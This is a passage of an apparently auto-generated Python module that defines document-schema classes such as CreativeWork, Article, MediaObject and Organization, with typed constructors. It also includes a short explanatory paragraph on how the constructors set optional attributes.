uses: Optional[Array[Union[str, "Variable"]]] = None
def __init__(
self,
text: str,
alters: Optional[Array[str]] = None,
assigns: Optional[Array[Union[str, "Variable"]]] = None,
declares: Optional[Array[Union[str, "Variable", "Function"]]] = None,
duration: Optional[float] = None,
errors: Optional[Array["CodeError"]] = None,
id: Optional[str] = None,
imports: Optional[Array[Union[str, "SoftwareSourceCode", "SoftwareApplication"]]] = None,
meta: Optional[Dict[str, Any]] = None,
outputs: Optional[Array["Node"]] = None,
programmingLanguage: Optional[str] = None,
reads: Optional[Array[str]] = None,
uses: Optional[Array[Union[str, "Variable"]]] = None
) -> None:
super().__init__(
text=text,
id=id,
meta=meta,
programmingLanguage=programmingLanguage
)
if alters is not None:
self.alters = alters
if assigns is not None:
self.assigns = assigns
if declares is not None:
self.declares = declares
if duration is not None:
self.duration = duration
if errors is not None:
self.errors = errors
if imports is not None:
self.imports = imports
if outputs is not None:
self.outputs = outputs
if reads is not None:
self.reads = reads
if uses is not None:
self.uses = uses
class CodeFragment(Code):
"""Inline code."""
def __init__(
self,
text: str,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
programmingLanguage: Optional[str] = None
) -> None:
super().__init__(
text=text,
id=id,
meta=meta,
programmingLanguage=programmingLanguage
)
class CodeExpression(CodeFragment):
"""An expression defined in programming language source code."""
errors: Optional[Array["CodeError"]] = None
output: Optional["Node"] = None
def __init__(
self,
text: str,
errors: Optional[Array["CodeError"]] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
output: Optional["Node"] = None,
programmingLanguage: Optional[str] = None
) -> None:
super().__init__(
text=text,
id=id,
meta=meta,
programmingLanguage=programmingLanguage
)
if errors is not None:
self.errors = errors
if output is not None:
self.output = output
class CodeError(Entity):
"""An error that occured when parsing, compiling or executing some Code."""
kind: str
message: Optional[str] = None
trace: Optional[str] = None
def __init__(
self,
kind: str,
id: Optional[str] = None,
message: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
trace: Optional[str] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if kind is not None:
self.kind = kind
if message is not None:
self.message = message
if trace is not None:
self.trace = trace
class ConstantSchema(Entity):
"""A schema specifying a constant value that a node must have."""
value: Optional["Node"] = None
def __init__(
self,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
value: Optional["Node"] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if value is not None:
self.value = value
class Date(Entity):
"""A date encoded as a ISO 8601 string."""
value: str
def __init__(
self,
value: str,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if value is not None:
self.value = value
class Mark(Entity):
"""
A base class for nodes that mark some other inline content in some way
(e.g. as being emphasised, or quoted).
"""
content: Array["InlineContent"]
def __init__(
self,
content: Array["InlineContent"],
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if content is not None:
self.content = content
class Delete(Mark):
"""Content that is marked for deletion"""
def __init__(
self,
content: Array["InlineContent"],
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
content=content,
id=id,
meta=meta
)
class Emphasis(Mark):
"""Emphasised content."""
def __init__(
self,
content: Array["InlineContent"],
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
content=content,
id=id,
meta=meta
)
class Thing(Entity):
"""The most generic type of item."""
alternateNames: Optional[Array[str]] = None
description: Optional[Union[str, Array["Node"]]] = None
name: Optional[str] = None
url: Optional[str] = None
def __init__(
self,
alternateNames: Optional[Array[str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
url: Optional[str] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if alternateNames is not None:
self.alternateNames = alternateNames
if description is not None:
self.description = description
if name is not None:
self.name = name
if url is not None:
self.url = url
class Brand(Thing):
"""
A brand used by an organization or person for labeling a product, product
group, or similar.
"""
name: str
logo: Optional[Union[str, "ImageObject"]] = None
reviews: Optional[Array[str]] = None
def __init__(
self,
name: str,
alternateNames: Optional[Array[str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
id: Optional[str] = None,
logo: Optional[Union[str, "ImageObject"]] = None,
meta: Optional[Dict[str, Any]] = None,
reviews: Optional[Array[str]] = None,
url: Optional[str] = None
) -> None:
super().__init__(
name=name,
alternateNames=alternateNames,
description=description,
id=id,
meta=meta,
url=url
)
if name is not None:
self.name = name
if logo is not None:
self.logo = logo
if reviews is not None:
self.reviews = reviews
class ContactPoint(Thing):
"""A contact point, for example, a R&D department."""
availableLanguages: Optional[Array[str]] = None
emails: Optional[Array[str]] = None
telephoneNumbers: Optional[Array[str]] = None
def __init__(
self,
alternateNames: Optional[Array[str]] = None,
availableLanguages: Optional[Array[str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
emails: Optional[Array[str]] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
telephoneNumbers: Optional[Array[str]] = None,
url: Optional[str] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
description=description,
id=id,
meta=meta,
name=name,
url=url
)
if availableLanguages is not None:
self.availableLanguages = availableLanguages
if emails is not None:
self.emails = emails
if telephoneNumbers is not None:
self.telephoneNumbers = telephoneNumbers
class CreativeWork(Thing):
"""
A creative work, including books, movies, photographs, software programs,
etc.
"""
authors: Optional[Array[Union["Person", "Organization"]]] = None
content: Optional[Array["Node"]] = None
dateCreated: Optional[Union["Date", str]] = None
dateModified: Optional[Union["Date", str]] = None
datePublished: Optional[Union["Date", str]] = None
editors: Optional[Array["Person"]] = None
funders: Optional[Array[Union["Person", "Organization"]]] = None
isPartOf: Optional["CreativeWorkTypes"] = None
keywords: Optional[Array[str]] = None
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None
parts: Optional[Array["CreativeWorkTypes"]] = None
publisher: Optional[Union["Person", "Organization"]] = None
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None
text: Optional[str] = None
title: Optional[Union[str, Array["Node"]]] = None
version: Optional[Union[str, float]] = None
def __init__(
self,
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
content: Optional[Array["Node"]] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
title: Optional[Union[str, Array["Node"]]] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
description=description,
id=id,
meta=meta,
name=name,
url=url
)
if authors is not None:
self.authors = authors
if content is not None:
self.content = content
if dateCreated is not None:
self.dateCreated = dateCreated
if dateModified is not None:
self.dateModified = dateModified
if datePublished is not None:
self.datePublished = datePublished
if editors is not None:
self.editors = editors
if funders is not None:
self.funders = funders
if isPartOf is not None:
self.isPartOf = isPartOf
if keywords is not None:
self.keywords = keywords
if licenses is not None:
self.licenses = licenses
if parts is not None:
self.parts = parts
if publisher is not None:
self.publisher = publisher
if references is not None:
self.references = references
if text is not None:
self.text = text
if title is not None:
self.title = title
if version is not None:
self.version = version
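Every constructor in this module follows the same pattern: optional keyword arguments are assigned as instance attributes only when a value was actually provided, so unset fields fall back to the class-level default. The following standalone sketch (illustrative only, the `Example` class is not part of the generated schema) shows why: serializers can then distinguish "explicitly set" from "defaulted" by inspecting the instance `__dict__`.

```python
from typing import Any, Dict, Optional

# Minimal sketch (illustrative, not part of the generated schema) of the
# pattern these classes follow: optional keyword arguments are only
# assigned as instance attributes when a value was actually provided.
class Example:
    name: str
    meta: Optional[Dict[str, Any]] = None

    def __init__(self, name: str, meta: Optional[Dict[str, Any]] = None) -> None:
        self.name = name
        if meta is not None:
            self.meta = meta

e = Example("demo")
# Unset optionals resolve to the class-level default rather than an
# instance attribute, so a serializer can skip them entirely.
assert e.meta is None
assert "meta" not in e.__dict__
```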
class Article(CreativeWork):
"""An article, including news and scholarly articles."""
authors: Array[Union["Person", "Organization"]]
title: Union[str, Array["Node"]]
environment: Optional["Environment"] = None
def __init__(
self,
authors: Array[Union["Person", "Organization"]],
title: Union[str, Array["Node"]],
alternateNames: Optional[Array[str]] = None,
content: Optional[Array["Node"]] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
environment: Optional["Environment"] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
authors=authors,
title=title,
alternateNames=alternateNames,
content=content,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
url=url,
version=version
)
if authors is not None:
self.authors = authors
if title is not None:
self.title = title
if environment is not None:
self.environment = environment
class Collection(CreativeWork):
"""A created collection of CreativeWorks or other artefacts."""
parts: Array["CreativeWorkTypes"]
def __init__(
self,
parts: Array["CreativeWorkTypes"],
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
content: Optional[Array["Node"]] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
title: Optional[Union[str, Array["Node"]]] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
parts=parts,
alternateNames=alternateNames,
authors=authors,
content=content,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if parts is not None:
self.parts = parts
class Datatable(CreativeWork):
"""A table of data."""
columns: Array["DatatableColumn"]
def __init__(
self,
columns: Array["DatatableColumn"],
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
content: Optional[Array["Node"]] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
title: Optional[Union[str, Array["Node"]]] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
authors=authors,
content=content,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if columns is not None:
self.columns = columns
class MediaObject(CreativeWork):
"""
A media object, such as an image, video, or audio object embedded in a web
page or a downloadable dataset.
"""
contentUrl: str
bitrate: Optional[float] = None
contentSize: Optional[float] = None
embedUrl: Optional[str] = None
format: Optional[str] = None
def __init__(
self,
contentUrl: str,
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
bitrate: Optional[float] = None,
content: Optional[Array["Node"]] = None,
contentSize: Optional[float] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
embedUrl: Optional[str] = None,
format: Optional[str] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
title: Optional[Union[str, Array["Node"]]] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
authors=authors,
content=content,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if contentUrl is not None:
self.contentUrl = contentUrl
if bitrate is not None:
self.bitrate = bitrate
if contentSize is not None:
self.contentSize = contentSize
if embedUrl is not None:
self.embedUrl = embedUrl
if format is not None:
self.format = format
class AudioObject(MediaObject):
"""An audio file"""
caption: Optional[str] = None
transcript: Optional[str] = None
def __init__(
self,
contentUrl: str,
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
bitrate: Optional[float] = None,
caption: Optional[str] = None,
content: Optional[Array["Node"]] = None,
contentSize: Optional[float] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
embedUrl: Optional[str] = None,
format: Optional[str] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
title: Optional[Union[str, Array["Node"]]] = None,
transcript: Optional[str] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
contentUrl=contentUrl,
alternateNames=alternateNames,
authors=authors,
bitrate=bitrate,
content=content,
contentSize=contentSize,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
embedUrl=embedUrl,
format=format,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if caption is not None:
self.caption = caption
if transcript is not None:
self.transcript = transcript
class DatatableColumn(Thing):
"""A column of data within a Datatable."""
name: str
values: Array[Any]
schema: Optional["ArraySchema"] = None
def __init__(
self,
name: str,
values: Array[Any],
alternateNames: Optional[Array[str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
schema: Optional["ArraySchema"] = None,
url: Optional[str] = None
) -> None:
super().__init__(
name=name,
alternateNames=alternateNames,
description=description,
id=id,
meta=meta,
url=url
)
if name is not None:
self.name = name
if values is not None:
self.values = values
if schema is not None:
self.schema = schema
class EnumSchema(Entity):
"""A schema specifying that a node must be one of several values."""
values: Optional[Array["Node"]] = None
def __init__(
self,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
values: Optional[Array["Node"]] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if values is not None:
self.values = values
class Environment(Thing):
"""A computational environment."""
name: str
adds: Optional[Array["SoftwareSourceCode"]] = None
extends: Optional[Array["Environment"]] = None
removes: Optional[Array["SoftwareSourceCode"]] = None
def __init__(
self,
name: str,
adds: Optional[Array["SoftwareSourceCode"]] = None,
alternateNames: Optional[Array[str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
extends: Optional[Array["Environment"]] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
removes: Optional[Array["SoftwareSourceCode"]] = None,
url: Optional[str] = None
) -> None:
super().__init__(
name=name,
alternateNames=alternateNames,
description=description,
id=id,
meta=meta,
url=url
)
if name is not None:
self.name = name
if adds is not None:
self.adds = adds
if extends is not None:
self.extends = extends
if removes is not None:
self.removes = removes
class Figure(CreativeWork):
"""
Encapsulates one or more images, videos, tables, etc., and provides captions
and labels for them.
"""
caption: Optional[Array["Node"]] = None
label: Optional[str] = None
def __init__(
self,
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
caption: Optional[Array["Node"]] = None,
content: Optional[Array["Node"]] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
label: Optional[str] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
title: Optional[Union[str, Array["Node"]]] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
authors=authors,
content=content,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if caption is not None:
self.caption = caption
if label is not None:
self.label = label
class Function(Entity):
"""
A function with a name, which might take Parameters and return a value of a
certain type.
"""
name: str
parameters: Optional[Array["Parameter"]] = None
returns: Optional["SchemaTypes"] = None
def __init__(
self,
name: str,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
parameters: Optional[Array["Parameter"]] = None,
returns: Optional["SchemaTypes"] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if name is not None:
self.name = name
if parameters is not None:
self.parameters = parameters
if returns is not None:
self.returns = returns
class Heading(Entity):
"""Heading"""
content: Array["InlineContent"]
depth: float
def __init__(
self,
content: Array["InlineContent"],
depth: float,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if content is not None:
self.content = content
if depth is not None:
self.depth = depth
class ImageObject(MediaObject):
"""An image file."""
caption: Optional[str] = None
thumbnail: Optional["ImageObject"] = None
def __init__(
self,
contentUrl: str,
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
bitrate: Optional[float] = None,
caption: Optional[str] = None,
content: Optional[Array["Node"]] = None,
contentSize: Optional[float] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
embedUrl: Optional[str] = None,
format: Optional[str] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
thumbnail: Optional["ImageObject"] = None,
title: Optional[Union[str, Array["Node"]]] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
contentUrl=contentUrl,
alternateNames=alternateNames,
authors=authors,
bitrate=bitrate,
content=content,
contentSize=contentSize,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
embedUrl=embedUrl,
format=format,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if caption is not None:
self.caption = caption
if thumbnail is not None:
self.thumbnail = thumbnail
class Include(Entity):
"""
A directive to include content from an external source (e.g. a file or URL)
or from inline content.
"""
source: str
content: Optional[Array["Node"]] = None
hash: Optional[str] = None
mediaType: Optional[str] = None
def __init__(
self,
source: str,
content: Optional[Array["Node"]] = None,
hash: Optional[str] = None,
id: Optional[str] = None,
mediaType: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if source is not None:
self.source = source
if content is not None:
self.content = content
if hash is not None:
self.hash = hash
if mediaType is not None:
self.mediaType = mediaType
class NumberSchema(Entity):
"""A schema specifying the constraints on a numeric node."""
exclusiveMaximum: Optional[float] = None
exclusiveMinimum: Optional[float] = None
maximum: Optional[float] = None
minimum: Optional[float] = None
multipleOf: Optional[float] = None
def __init__(
self,
exclusiveMaximum: Optional[float] = None,
exclusiveMinimum: Optional[float] = None,
id: Optional[str] = None,
maximum: Optional[float] = None,
meta: Optional[Dict[str, Any]] = None,
minimum: Optional[float] = None,
multipleOf: Optional[float] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if exclusiveMaximum is not None:
self.exclusiveMaximum = exclusiveMaximum
if exclusiveMinimum is not None:
self.exclusiveMinimum = exclusiveMinimum
if maximum is not None:
self.maximum = maximum
if minimum is not None:
self.minimum = minimum
if multipleOf is not None:
self.multipleOf = multipleOf
class IntegerSchema(NumberSchema):
"""A schema specifying the constraints on an integer node."""
def __init__(
self,
exclusiveMaximum: Optional[float] = None,
exclusiveMinimum: Optional[float] = None,
id: Optional[str] = None,
maximum: Optional[float] = None,
meta: Optional[Dict[str, Any]] = None,
minimum: Optional[float] = None,
multipleOf: Optional[float] = None
) -> None:
super().__init__(
exclusiveMaximum=exclusiveMaximum,
exclusiveMinimum=exclusiveMinimum,
id=id,
maximum=maximum,
meta=meta,
minimum=minimum,
multipleOf=multipleOf
)
class Link(Entity):
"""
A hyperlink to other pages, sections within the same document, resources,
or any URL.
"""
content: Array["InlineContent"]
target: str
relation: Optional[str] = None
title: Optional[str] = None
def __init__(
self,
content: Array["InlineContent"],
target: str,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
relation: Optional[str] = None,
title: Optional[str] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if content is not None:
self.content = content
if target is not None:
self.target = target
if relation is not None:
self.relation = relation
if title is not None:
self.title = title
class List(Entity):
"""A list of items."""
items: Array["ListItem"]
order: Optional["EItemListOrder"] = None
def __init__(
self,
items: Array["ListItem"],
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
order: Optional["EItemListOrder"] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if items is not None:
self.items = items
if order is not None:
self.order = order
class ListItem(Entity):
"""A single item in a list."""
content: Array["Node"]
checked: Optional[bool] = None
def __init__(
self,
content: Array["Node"],
checked: Optional[bool] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if content is not None:
self.content = content
if checked is not None:
self.checked = checked
class Mount(Thing):
"""Describes a volume mount from a host to container."""
mountDestination: str
mountOptions: Optional[Array[str]] = None
mountSource: Optional[str] = None
mountType: Optional[str] = None
def __init__(
self,
mountDestination: str,
alternateNames: Optional[Array[str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
mountOptions: Optional[Array[str]] = None,
mountSource: Optional[str] = None,
mountType: Optional[str] = None,
name: Optional[str] = None,
url: Optional[str] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
description=description,
id=id,
meta=meta,
name=name,
url=url
)
if mountDestination is not None:
self.mountDestination = mountDestination
if mountOptions is not None:
self.mountOptions = mountOptions
if mountSource is not None:
self.mountSource = mountSource
if mountType is not None:
self.mountType = mountType
class Organization(Thing):
"""An organization such as a school, NGO, corporation, club, etc."""
address: Optional[str] = None
brands: Optional[Array["Brand"]] = None
contactPoints: Optional[Array["ContactPoint"]] = None
departments: Optional[Array["Organization"]] = None
funders: Optional[Array[Union["Organization", "Person"]]] = None
legalName: Optional[str] = None
parentOrganization: Optional["Organization"] = None
def __init__(
self,
address: Optional[str] = None,
alternateNames: Optional[Array[str]] = None,
brands: Optional[Array["Brand"]] = None,
contactPoints: Optional[Array["ContactPoint"]] = None,
departments: Optional[Array["Organization"]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
funders: Optional[Array[Union["Organization", "Person"]]] = None,
id: Optional[str] = None,
legalName: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parentOrganization: Optional["Organization"] = None,
url: Optional[str] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
description=description,
id=id,
meta=meta,
name=name,
url=url
)
if address is not None:
self.address = address
if brands is not None:
self.brands = brands
if contactPoints is not None:
self.contactPoints = contactPoints
if departments is not None:
self.departments = departments
if funders is not None:
self.funders = funders
if legalName is not None:
self.legalName = legalName
if parentOrganization is not None:
self.parentOrganization = parentOrganization
class Paragraph(Entity):
"""Paragraph"""
content: Array["InlineContent"]
def __init__(
self,
content: Array["InlineContent"],
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if content is not None:
self.content = content
class Variable(Entity):
"""A variable that can be set and used in code."""
name: str
default: Optional["Node"] = None
required: Optional[bool] = None
schema: Optional["SchemaTypes"] = None
def __init__(
self,
name: str,
default: Optional["Node"] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
required: Optional[bool] = None,
schema: Optional["SchemaTypes"] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if name is not None:
self.name = name
if default is not None:
self.default = default
if required is not None:
self.required = required
if schema is not None:
self.schema = schema
class Parameter(Variable):
"""A parameter that can be set and used in evaluated code."""
default: Optional["Node"] = None
extends: Optional[bool] = None
repeats: Optional[bool] = None
required: Optional[bool] = None
def __init__(
self,
name: str,
default: Optional["Node"] = None,
extends: Optional[bool] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
repeats: Optional[bool] = None,
required: Optional[bool] = None,
schema: Optional["SchemaTypes"] = None
) -> None:
super().__init__(
name=name,
id=id,
meta=meta,
schema=schema
)
if default is not None:
self.default = default
if extends is not None:
self.extends = extends
if repeats is not None:
self.repeats = repeats
if required is not None:
self.required = required
class Periodical(CreativeWork):
"""A periodical publication."""
dateEnd: Optional[Union["Date", str]] = None
dateStart: Optional[Union["Date", str]] = None
issn: Optional[Array[str]] = None
def __init__(
self,
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
content: Optional[Array["Node"]] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateEnd: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
dateStart: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
